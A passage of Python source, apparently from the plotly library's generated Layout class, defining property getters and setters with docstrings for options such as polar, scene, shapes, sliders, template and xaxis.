lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['plot_bgcolor']
@plot_bgcolor.setter
def plot_bgcolor(self, val):
self['plot_bgcolor'] = val
# polar
# -----
@property
def polar(self):
"""
The 'polar' property is an instance of Polar
that may be specified as:
- An instance of plotly.graph_objs.layout.Polar
- A dict of string/value properties that will be passed
to the Polar constructor
Supported dict properties:
angularaxis
plotly.graph_objs.layout.polar.AngularAxis
instance or dict with compatible properties
bargap
Sets the gap between bars of adjacent location
coordinates. Values are unitless, they
represent fractions of the minimum difference
in bar positions in the data.
barmode
Determines how bars at the same location
coordinate are displayed on the graph. With
"stack", the bars are stacked on top of one
another With "overlay", the bars are plotted
over one another, you might need to an
"opacity" to see multiple bars.
bgcolor
Set the background color of the subplot
domain
plotly.graph_objs.layout.polar.Domain instance
or dict with compatible properties
gridshape
Determines if the radial axis grid lines and
angular axis line are drawn as "circular"
sectors or as "linear" (polygon) sectors. Has
an effect only when the angular axis has `type`
"category". Note that `radialaxis.angle` is
snapped to the angle of the closest vertex when
`gridshape` is "circular" (so that radial axis
scale is the same as the data scale).
hole
Sets the fraction of the radius to cut out of
the polar subplot.
radialaxis
plotly.graph_objs.layout.polar.RadialAxis
instance or dict with compatible properties
sector
Sets angular span of this polar subplot with
two angles (in degrees). Sector are assumed to
be spanned in the counterclockwise direction
with 0 corresponding to rightmost limit of the
polar subplot.
Returns
-------
plotly.graph_objs.layout.Polar
"""
return self['polar']
@polar.setter
def polar(self, val):
self['polar'] = val
# radialaxis
# ----------
@property
def radialaxis(self):
"""
The 'radialaxis' property is an instance of RadialAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.RadialAxis
- A dict of string/value properties that will be passed
to the RadialAxis constructor
Supported dict properties:
domain
Polar chart subplots are not supported yet.
This key has currently no effect.
endpadding
Legacy polar charts are deprecated! Please
switch to "polar" subplots.
orientation
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the
orientation (an angle with respect to the
origin) of the radial axis.
range
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Defines the start
and end point of this radial axis.
showline
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the line bounding this radial axis will
be shown on the figure.
showticklabels
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the radial axis ticks will feature tick
labels.
tickcolor
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the color of
the tick lines on this radial axis.
ticklen
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this radial axis.
tickorientation
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the
orientation (from the paper perspective) of the
radial axis tick labels.
ticksuffix
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this radial axis.
visible
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not this axis will be visible.
Returns
-------
plotly.graph_objs.layout.RadialAxis
"""
return self['radialaxis']
@radialaxis.setter
def radialaxis(self, val):
self['radialaxis'] = val
# scene
# -----
@property
def scene(self):
"""
The 'scene' property is an instance of Scene
that may be specified as:
- An instance of plotly.graph_objs.layout.Scene
- A dict of string/value properties that will be passed
to the Scene constructor
Supported dict properties:
annotations
plotly.graph_objs.layout.scene.Annotation
instance or dict with compatible properties
annotationdefaults
When used in a template (as layout.template.lay
out.scene.annotationdefaults), sets the default
property values to use for elements of
layout.scene.annotations
aspectmode
If "cube", this scene's axes are drawn as a
cube, regardless of the axes' ranges. If
"data", this scene's axes are drawn in
proportion with the axes' ranges. If "manual",
this scene's axes are drawn in proportion with
the input of "aspectratio" (the default
behavior if "aspectratio" is provided). If
"auto", this scene's axes are drawn using the
results of "data" except when one axis is more
than four times the size of the two others,
where in that case the results of "cube" are
used.
aspectratio
Sets this scene's axis aspectratio.
bgcolor
camera
plotly.graph_objs.layout.scene.Camera instance
or dict with compatible properties
domain
plotly.graph_objs.layout.scene.Domain instance
or dict with compatible properties
dragmode
Determines the mode of drag interactions for
this scene.
hovermode
Determines the mode of hover interactions for
this scene.
xaxis
plotly.graph_objs.layout.scene.XAxis instance
or dict with compatible properties
yaxis
plotly.graph_objs.layout.scene.YAxis instance
or dict with compatible properties
zaxis
plotly.graph_objs.layout.scene.ZAxis instance
or dict with compatible properties
Returns
-------
plotly.graph_objs.layout.Scene
"""
return self['scene']
@scene.setter
def scene(self, val):
self['scene'] = val
# selectdirection
# ---------------
@property
def selectdirection(self):
"""
When "dragmode" is set to "select", this limits the selection
of the drag to horizontal, vertical or diagonal. "h" only
allows horizontal selection, "v" only vertical, "d" only
diagonal and "any" sets no limit.
The 'selectdirection' property is an enumeration that may be specified as:
- One of the following enumeration values:
['h', 'v', 'd', 'any']
Returns
-------
Any
"""
return self['selectdirection']
@selectdirection.setter
def selectdirection(self, val):
self['selectdirection'] = val
# separators
# ----------
@property
def separators(self):
"""
Sets the decimal and thousand separators. For example, *. *
puts a '.' before decimals and a space between thousands. In
English locales, dflt is ".," but other locales may alter this
default.
The 'separators' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['separators']
@separators.setter
def separators(self, val):
self['separators'] = val
# shapes
# ------
@property
def shapes(self):
"""
The 'shapes' property is a tuple of instances of
Shape that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Shape
- A list or tuple of dicts of string/value properties that
will be passed to the Shape constructor
Supported dict properties:
fillcolor
Sets the color filling the shape's interior.
layer
Specifies whether shapes are drawn below or
above traces.
line
plotly.graph_objs.layout.shape.Line instance or
dict with compatible properties
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
opacity
Sets the opacity of the shape.
path
For `type` "path" - a valid SVG path with the
pixel values replaced by data values in
`xsizemode`/`ysizemode` being "scaled" and
taken unmodified as pixels relative to
`xanchor` and `yanchor` in case of "pixel" size
mode. There are a few restrictions / quirks
only absolute instructions, not relative. So
the allowed segments are: M, L, H, V, Q, C, T,
S, and Z arcs (A) are not allowed because
radius rx and ry are relative. In the future we
could consider supporting relative commands,
but we would have to decide on how to handle
date and log axes. Note that even as is, Q and
C Bezier paths that are smooth on linear axes
may not be smooth on log, and vice versa. no
chained "polybezier" commands - specify the
segment type for each one. On category axes,
values are numbers scaled to the serial numbers
of categories because using the categories
themselves there would be no way to describe
fractional positions On data axes: because
space and T are both normal components of path
strings, we can't use either to separate date
from time parts. Therefore we'll use underscore
for this purpose: 2015-02-21_13:45:56.789
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
type
Specifies the shape type to be drawn. If
"line", a line is drawn from (`x0`,`y0`) to
(`x1`,`y1`) with respect to the axes' sizing
mode. If "circle", a circle is drawn from
((`x0`+`x1`)/2, (`y0`+`y1`)/2)) with radius
(|(`x0`+`x1`)/2 - `x0`|, |(`y0`+`y1`)/2
-`y0`)|) with respect to the axes' sizing mode.
If "rect", a rectangle is drawn linking
(`x0`,`y0`), (`x1`,`y0`), (`x1`,`y1`),
(`x0`,`y1`), (`x0`,`y0`) with respect to the
axes' sizing mode. If "path", draw a custom SVG
path using `path`. with respect to the axes'
sizing mode.
visible
Determines whether or not this shape is
visible.
x0
Sets the shape's starting x position. See
`type` and `xsizemode` for more info.
x1
Sets the shape's end x position. See `type` and
`xsizemode` for more info.
xanchor
Only relevant in conjunction with `xsizemode`
set to "pixel". Specifies the anchor point on
the x axis to which `x0`, `x1` and x
coordinates within `path` are relative to. E.g.
useful to attach a pixel sized shape to a
certain data value. No effect when `xsizemode`
not set to "pixel".
xref
Sets the shape's x coordinate axis. If set to
an x axis id (e.g. "x" or "x2"), the `x`
position refers to an x coordinate. If set to
"paper", the `x` position refers to the
distance from the left side of the plotting
area in normalized coordinates where 0 (1)
corresponds to the left (right) side. If the
axis `type` is "log", then you must take the
log of your desired range. If the axis `type`
is "date", then you must convert the date to
unix time in milliseconds.
xsizemode
Sets the shapes's sizing mode along the x axis.
If set to "scaled", `x0`, `x1` and x
coordinates within `path` refer to data values
on the x axis or a fraction of the plot area's
width (`xref` set to "paper"). If set to
"pixel", `xanchor` specifies the x position in
terms of data or plot fraction but `x0`, `x1`
and x coordinates within `path` are pixels
relative to `xanchor`. This way, the shape can
have a fixed width while maintaining a position
relative to data or plot fraction.
y0
Sets the shape's starting y position. See
`type` and `ysizemode` for more info.
y1
Sets the shape's end y position. See `type` and
`ysizemode` for more info.
yanchor
Only relevant in conjunction with `ysizemode`
set to "pixel". Specifies the anchor point on
the y axis to which `y0`, `y1` and y
coordinates within `path` are relative to. E.g.
useful to attach a pixel sized shape to a
certain data value. No effect when `ysizemode`
not set to "pixel".
yref
Sets the annotation's y coordinate axis. If set
to an y axis id (e.g. "y" or "y2"), the `y`
position refers to an y coordinate If set to
"paper", the `y` position refers to the
distance from the bottom of the plotting area
in normalized coordinates where 0 (1)
corresponds to the bottom (top).
ysizemode
Sets the shapes's sizing mode along the y axis.
If set to "scaled", `y0`, `y1` and y
coordinates within `path` refer to data values
on the y axis or a fraction of the plot area's
height (`yref` set to "paper"). If set to
"pixel", `yanchor` specifies the y position in
terms of data or plot fraction but `y0`, `y1`
and y coordinates within `path` are pixels
relative to `yanchor`. This way, the shape can
have a fixed height while maintaining a
position relative to data or plot fraction.
Returns
-------
tuple[plotly.graph_objs.layout.Shape]
"""
return self['shapes']
@shapes.setter
def shapes(self, val):
self['shapes'] = val
# shapedefaults
# -------------
@property
def shapedefaults(self):
"""
When used in a template (as
layout.template.layout.shapedefaults), sets the default
property values to use for elements of layout.shapes
The 'shapedefaults' property is an instance of Shape
that may be specified as:
- An instance of plotly.graph_objs.layout.Shape
- A dict of string/value properties that will be passed
to the Shape constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Shape
"""
return self['shapedefaults']
@shapedefaults.setter
def shapedefaults(self, val):
self['shapedefaults'] = val
# showlegend
# ----------
@property
def showlegend(self):
"""
Determines whether or not a legend is drawn. Default is `true`
if there is a trace to show and any of these: a) Two or more
traces would by default be shown in the legend. b) One pie
trace is shown in the legend. c) One trace is explicitly given
with `showlegend: true`.
The 'showlegend' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['showlegend']
@showlegend.setter
def showlegend(self, val):
self['showlegend'] = val
# sliders
# -------
@property
def sliders(self):
"""
The 'sliders' property is a tuple of instances of
Slider that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Slider
- A list or tuple of dicts of string/value properties that
will be passed to the Slider constructor
Supported dict properties:
active
Determines which button (by index starting from
0) is considered active.
activebgcolor
Sets the background color of the slider grip
while dragging.
bgcolor
Sets the background color of the slider.
bordercolor
Sets the color of the border enclosing the
slider.
borderwidth
Sets the width (in px) of the border enclosing
the slider.
currentvalue
plotly.graph_objs.layout.slider.Currentvalue
instance or dict with compatible properties
font
Sets the font of the slider step labels.
len
Sets the length of the slider This measure
excludes the padding of both ends. That is, the
slider's length is this length minus the
padding on both ends.
lenmode
Determines whether this slider length is set in
units of plot "fraction" or in *pixels. Use
`len` to set the value.
minorticklen
Sets the length in pixels of minor step tick
marks
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
pad
Set the padding of the slider component along
each side.
steps
plotly.graph_objs.layout.slider.Step instance
or dict with compatible properties
stepdefaults
When used in a template (as
layout.template.layout.slider.stepdefaults),
sets the default property values to use for
elements of layout.slider.steps
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
tickcolor
Sets the color of the border enclosing the
slider.
ticklen
Sets the length in pixels of step tick marks
tickwidth
Sets the tick width (in px).
transition
plotly.graph_objs.layout.slider.Transition
instance or dict with compatible properties
visible
Determines whether or not the slider is
visible.
x
Sets the x position (in normalized coordinates)
of the slider.
xanchor
Sets the slider's horizontal position anchor.
This anchor binds the `x` position to the
"left", "center" or "right" of the range
selector.
y
Sets the y position (in normalized coordinates)
of the slider.
yanchor
Sets the slider's vertical position anchor This
anchor binds the `y` position to the "top",
"middle" or "bottom" of the range selector.
Returns
-------
tuple[plotly.graph_objs.layout.Slider]
"""
return self['sliders']
@sliders.setter
def sliders(self, val):
self['sliders'] = val
# sliderdefaults
# --------------
@property
def sliderdefaults(self):
"""
When used in a template (as
layout.template.layout.sliderdefaults), sets the default
property values to use for elements of layout.sliders
The 'sliderdefaults' property is an instance of Slider
that may be specified as:
- An instance of plotly.graph_objs.layout.Slider
- A dict of string/value properties that will be passed
to the Slider constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Slider
"""
return self['sliderdefaults']
@sliderdefaults.setter
def sliderdefaults(self, val):
self['sliderdefaults'] = val
# spikedistance
# -------------
@property
def spikedistance(self):
"""
Sets the default distance (in pixels) to look for data to draw
spikelines to (-1 means no cutoff, 0 means no looking for
data). As with hoverdistance, distance does not apply to area-
like objects. In addition, some objects can be hovered on but
will not generate spikelines, such as scatter fills.
The 'spikedistance' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
Returns
-------
int
"""
return self['spikedistance']
@spikedistance.setter
def spikedistance(self, val):
self['spikedistance'] = val
# template
# --------
@property
def template(self):
"""
Default attributes to be applied to the plot. This should be a
dict with format: `{'layout': layoutTemplate, 'data':
{trace_type: [traceTemplate, ...], ...}}` where
`layoutTemplate` is a dict matching the structure of
`figure.layout` and `traceTemplate` is a dict matching the
structure of the trace with type `trace_type` (e.g. 'scatter').
Alternatively, this may be specified as an instance of
plotly.graph_objs.layout.Template. Trace templates are applied
cyclically to traces of each type. Container arrays (eg
`annotations`) have special handling: An object ending in
`defaults` (eg `annotationdefaults`) is applied to each array
item. But if an item has a `templateitemname` key we look in
the template array for an item with matching `name` and apply
that instead. If no matching `name` is found we mark the item
invisible. Any named template item not referenced is appended
to the end of the array, so this can be used to add a watermark
annotation or a logo image, for example. To omit one of these
items on the plot, make an item with matching
`templateitemname` and `visible: false`.
The 'template' property is an instance of Template
that may be specified as:
- An instance of plotly.graph_objs.layout.Template
- A dict of string/value properties that will be passed
to the Template constructor
Supported dict properties:
data
plotly.graph_objs.layout.template.Data instance
or dict with compatible properties
layout
plotly.graph_objs.layout.template.Layout
instance or dict with compatible properties
- The name of a registered template where current registered templates
are stored in the plotly.io.templates configuration object. The names
of all registered templates can be retrieved with:
>>> import plotly.io as pio
>>> list(pio.templates)
- A string containing multiple registered template names, joined on '+'
characters (e.g. 'template1+template2'). In this case the resulting
template is computed by merging together the collection of registered
templates
Returns
-------
plotly.graph_objs.layout.Template
"""
return self['template']
@template.setter
def template(self, val):
self['template'] = val
# ternary
# -------
@property
def ternary(self):
"""
The 'ternary' property is an instance of Ternary
that may be specified as:
- An instance of plotly.graph_objs.layout.Ternary
- A dict of string/value properties that will be passed
to the Ternary constructor
Supported dict properties:
aaxis
plotly.graph_objs.layout.ternary.Aaxis instance
or dict with compatible properties
baxis
plotly.graph_objs.layout.ternary.Baxis instance
or dict with compatible properties
bgcolor
Set the background color of the subplot
caxis
plotly.graph_objs.layout.ternary.Caxis instance
or dict with compatible properties
domain
plotly.graph_objs.layout.ternary.Domain
instance or dict with compatible properties
sum
The number each triplet should sum to, and the
maximum range of each axis
Returns
-------
plotly.graph_objs.layout.Ternary
"""
return self['ternary']
@ternary.setter
def ternary(self, val):
self['ternary'] = val
# title
# -----
@property
def title(self):
"""
Sets the plot's title.
The 'title' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['title']
@title.setter
def title(self, val):
self['title'] = val
# titlefont
# ---------
@property
def titlefont(self):
"""
Sets the title font.
The 'titlefont' property is an instance of Titlefont
that may be specified as:
- An instance of plotly.graph_objs.layout.Titlefont
- A dict of string/value properties that will be passed
to the Titlefont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.layout.Titlefont
"""
return self['titlefont']
@titlefont.setter
def titlefont(self, val):
self['titlefont'] = val
# updatemenus
# -----------
@property
def updatemenus(self):
"""
The 'updatemenus' property is a tuple of instances of
Updatemenu that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Updatemenu
- A list or tuple of dicts of string/value properties that
will be passed to the Updatemenu constructor
Supported dict properties:
active
Determines which button (by index starting from
0) is considered active.
bgcolor
Sets the background color of the update menu
buttons.
bordercolor
Sets the color of the border enclosing the
update menu.
borderwidth
Sets the width (in px) of the border enclosing
the update menu.
buttons
plotly.graph_objs.layout.updatemenu.Button
instance or dict with compatible properties
buttondefaults
When used in a template (as layout.template.lay
out.updatemenu.buttondefaults), sets the
default property values to use for elements of
layout.updatemenu.buttons
direction
Determines the direction in which the buttons
are laid out, whether in a dropdown menu or a
row/column of buttons. For `left` and `up`, the
buttons will still appear in left-to-right or
top-to-bottom order respectively.
font
Sets the font of the update menu button text.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
pad
Sets the padding around the buttons or dropdown
menu.
showactive
Highlights active dropdown item or active
button if true.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
type
Determines whether the buttons are accessible
via a dropdown menu or whether the buttons are
stacked horizontally or vertically
visible
Determines whether or not the update menu is
visible.
x
Sets the x position (in normalized coordinates)
of the update menu.
xanchor
Sets the update menu's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the range
selector.
y
Sets the y position (in normalized coordinates)
of the update menu.
yanchor
Sets the update menu's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the range
selector.
Returns
-------
tuple[plotly.graph_objs.layout.Updatemenu]
"""
return self['updatemenus']
@updatemenus.setter
def updatemenus(self, val):
self['updatemenus'] = val
# updatemenudefaults
# ------------------
@property
def updatemenudefaults(self):
"""
When used in a template (as
layout.template.layout.updatemenudefaults), sets the default
property values to use for elements of layout.updatemenus
The 'updatemenudefaults' property is an instance of Updatemenu
that may be specified as:
- An instance of plotly.graph_objs.layout.Updatemenu
- A dict of string/value properties that will be passed
to the Updatemenu constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Updatemenu
"""
return self['updatemenudefaults']
@updatemenudefaults.setter
def updatemenudefaults(self, val):
self['updatemenudefaults'] = val
# violingap
# ---------
@property
def violingap(self):
"""
Sets the gap (in plot fraction) between violins of adjacent
location coordinates.
The 'violingap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['violingap']
@violingap.setter
def violingap(self, val):
self['violingap'] = val
# violingroupgap
# --------------
@property
def violingroupgap(self):
"""
Sets the gap (in plot fraction) between violins of the same
location coordinate.
The 'violingroupgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['violingroupgap']
@violingroupgap.setter
def violingroupgap(self, val):
self['violingroupgap'] = val
# violinmode
# ----------
@property
def violinmode(self):
"""
Determines how violins at the same location coordinate are
displayed on the graph. If "group", the violins are plotted
next to one another centered around the shared location. If
"overlay", the violins are plotted over one another, you might
need to set "opacity" to see them multiple violins.
The 'violinmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['group', 'overlay']
Returns
-------
Any
"""
return self['violinmode']
@violinmode.setter
def violinmode(self, val):
self['violinmode'] = val
# width
# -----
@property
def width(self):
"""
Sets the plot's width (in px).
The 'width' property is a number and may be specified as:
- An int or float in the interval [10, inf]
Returns
-------
int|float
"""
return self['width']
@width.setter
def width(self, val):
self['width'] = val
# xaxis
# -----
@property
def xaxis(self):
"""
The 'xaxis' property is an instance of XAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.XAxis
- A dict of string/value properties that will be passed
to the XAxis constructor
Supported dict properties:
anchor
If set to an opposite-letter axis id (e.g.
`x2`, `y`), this axis is bound to the
corresponding opposite-letter axis. If set to
"free", this axis' position is determined by
`position`.
automargin
Determines whether long tick labels
automatically grow the figure margins.
autorange
Determines whether or not the range of this
axis is computed in relation to the input data.
See `rangemode` for more info. If `range` is
provided, then `autorange` is set to False.
calendar
Sets the calendar system to use for `range` and
`tick0` if this is a date axis. This does not
set the calendar for interpreting data on this
axis, that's specified in the trace or via the
global `layout.calendar`
categoryarray
Sets the order in which categories on this axis
appear. Only has an effect if `categoryorder`
is set to "array". Used with `categoryorder`.
categoryarraysrc
Sets the source reference on plot.ly for
categoryarray .
categoryorder
Specifies the ordering logic for the case of
categorical variables. By default, plotly uses
"trace", which specifies the order that is
present in the data supplied. Set
`categoryorder` to *category ascending* or
*category descending* if order should be
determined by the alphanumerical order of the
category names. Set `categoryorder` to "array"
to derive the ordering from the attribute
`categoryarray`. If a category is not found in
the `categoryarray` array, the sorting behavior
for that attribute will be identical to the
"trace" mode. The unspecified categories will
follow the categories in `categoryarray`.
color
Sets default for all colors associated with
this axis all at once: line, font, tick, and
grid colors. Grid color is lightened by
blending this with the plot background
Individual pieces can override this.
constrain
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines how that
happens: by increasing the "range" (default),
or by decreasing the "domain".
constraintoward
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines which
direction we push the originally specified plot
area. Options are "left", "center" (default),
and "right" for x axes, and "top", "middle"
(default), and "bottom" for y axes.
domain
Sets the domain of this axis (in plot
fraction).
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
fixedrange
Determines whether or not this axis is zoom-
able. If true, then zoom is disabled.
gridcolor
Sets the color of the grid lines.
gridwidth
Sets the width (in px) of the grid lines.
hoverformat
Sets the hover text formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
layer
Sets the layer on which this axis is displayed.
If *above traces*, this axis is displayed above
all the subplot's traces If *below traces*,
this axis is displayed below all the subplot's
traces, but above the grid lines. Useful when
used together with scatter-like traces with
`cliponaxis` set to False to show markers
and/or text nodes above this axis.
linecolor
Sets the axis line color.
linewidth
Sets the width (in px) of the axis line.
mirror
Determines if the axis lines or/and ticks are
mirrored to the opposite side of the plotting
area. If True, the axis lines are mirrored. If
"ticks", the axis lines and ticks are mirrored.
If False, mirroring is disable. If "all", axis
lines are mirrored on all shared-axes subplots.
If "allticks", axis lines and ticks are
mirrored on all shared-axes subplots.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
overlaying
If set a same-letter axis id, this axis is
overlaid on top of the corresponding same-
letter axis, with traces and axes visible for
both axes. If False, this axis does not overlay
any same-letter axes. In this case, for axes
with overlapping domains only the highest-
numbered axis will be visible.
position
Sets the position of this axis in the plotting
space (in normalized coordinates). Only has an
effect if `anchor` is set to "free".
range
Sets the range of this axis. If the axis `type`
is "log", then you must take the log of your
desired range (e.g. to set the range from 1 to
100, set the range from 0 to 2). If the axis
`type` is "date", it should be date strings,
like date data, though Date objects and unix
milliseconds will be accepted and converted to
strings. If the axis `type` is "category", it
should be numbers, using the scale where each
category is assigned a serial number from zero
in the order it appears.
rangemode
If "normal", the range is computed in relation
to the extrema of the input data. If *tozero*`,
the range extends to 0, regardless of the input
data If "nonnegative", the range is non-
negative, regardless of the input data. Applies
only to linear axes.
rangeselector
plotly.graph_objs.layout.xaxis.Rangeselector
instance or dict with compatible properties
rangeslider
plotly.graph_objs.layout.xaxis.Rangeslider
instance or dict with compatible properties
scaleanchor
If set to another axis id (e.g. `x2`, `y`), the
range of this axis changes together with the
range of the corresponding axis such that the
scale of pixels per unit is in a constant
ratio. Both axes are still zoomable, but when
you zoom one, the other will zoom the same
amount, keeping a fixed midpoint. `constrain`
and `constraintoward` determine how we enforce
the constraint. You can chain these, ie `yaxis:
{scaleanchor: *x*}, xaxis2: {scaleanchor: *y*}`
but you can only link axes of the same `type`.
The linked axis can have the opposite letter
(to constrain the aspect ratio) or the same
letter (to match scales across subplots). Loops
(`yaxis: {scaleanchor: *x*}, xaxis:
{scaleanchor: *y*}` or longer) are redundant
and the last constraint encountered will be
ignored to avoid possible inconsistent
constraints via `scaleratio`.
scaleratio
If this axis is linked to another by
`scaleanchor`, this determines the pixel to
unit scale ratio. For example, if this value is
10, then every unit on this axis spans 10 times
the number of pixels as a unit on the linked
axis. Use this for example to create an
elevation profile where the vertical scale is
exaggerated a fixed amount with respect to the
horizontal.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showgrid
Determines whether or not grid lines are drawn.
If True, the grid lines are drawn at every tick
mark.
showline
Determines whether or not a line bounding this
axis is drawn.
showspikes
Determines whether or not spikes (aka
droplines) are drawn for this axis. Note: This
only takes affect when hovermode = closest
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
side
Determines whether a x (y) axis is positioned
at the "bottom" ("left") or "top" ("right") of
the plotting area.
spikecolor
Sets the spike color. If undefined, will use
the series color
spikedash
Sets the dash style of lines. Set to a dash
type string ("solid", "dot", "dash",
"longdash", "dashdot", or "longdashdot") or a
dash length list in px (eg "5px,10px,2px,2px").
spikemode
Determines the drawing mode for the spike line
If "toaxis", the line is drawn from the data
point to the axis the series is plotted on. If
"across", the line is drawn across the entire
plot area, and supercedes "toaxis". If
"marker", then a marker dot is drawn on the
axis the series is plotted on
spikesnap
Determines whether spikelines are stuck to the
cursor or to the closest datapoints.
spikethickness
Sets the width (in px) of the zero line.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
